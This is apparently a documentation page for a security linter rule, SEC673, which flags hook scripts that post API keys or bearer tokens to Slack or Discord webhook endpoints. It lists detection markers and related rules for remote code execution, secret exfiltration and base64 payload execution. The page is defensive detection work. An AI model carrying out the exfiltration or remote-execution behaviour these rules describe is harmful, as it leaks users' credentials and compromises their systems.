lintai docs

Appearance

Rule Reference

SEC673lintai-ai-securitystablehookdeny

Hook script: webhook secret exfiltration

Hook script posts secret material to a webhook endpoint

Provider
lintai-ai-security
Surface
hook
Scope
per_file
Tier
stable
Severity
deny
Confidence
high
Detection
structural
Remediation
message_only

Activation Model

Preset Membership

This rule is part of the builtin activation graph through these preset memberships.

basemembership

Lifecycle

Stable Lifecycle Contract

State

stable_gated

Graduation rationale

Matches explicit secret-bearing posts to well-known webhook endpoints in executable hook lines.

Deterministic signal basis

HookSignals command-line analysis over non-comment hook lines for secret markers plus webhook endpoint markers such as `hooks.slack.com/services/` or `discord.com/api/webhooks/`.

Malicious corpus
hook-webhook-secret-exfil
Benign corpus
cursor-plugin-clean-basic
structured evidence required remediation reviewed
Canonical note

Structural stable rule intended as a high-precision check with deterministic evidence.

Nearby Signals

Related Rules

SEC201Hook script: remote code executionHook script downloads remote code and executes ithookstable
SEC202Hook script: secret exfiltrationHook script appears to exfiltrate secrets through a network callhookstable
SEC203Hook script: insecure HTTP secret sendHook script sends secret material to an insecure http:// endpointhookstable
SEC204Hook script: TLS verification disabledHook script disables TLS or certificate verification for a network callhookstable
SEC205Hook script: hardcoded auth in network callHook script embeds static authentication material in a network callhookstable
SEC206Hook script: base64 payload executionHook script decodes a base64 payload and executes ithookstable

Why It Matters

Webhook posts are a common low-friction exfiltration channel because they can send captured credentials or tokens directly to an attacker-controlled collector.

What Triggers

SEC673 matches executable hook lines that combine secret markers such as OPENAI_API_KEY or bearer auth material with webhook endpoints like Slack or Discord incoming webhooks.

False Positives

Shared committed hooks should not forward secret material to webhook collectors. If a webhook is legitimate, it should not include credentials or copied secret values in the request body or query.

Remediation

Remove the secret-bearing webhook post from the hook and keep secret access local to the trusted tool or provider that actually needs it.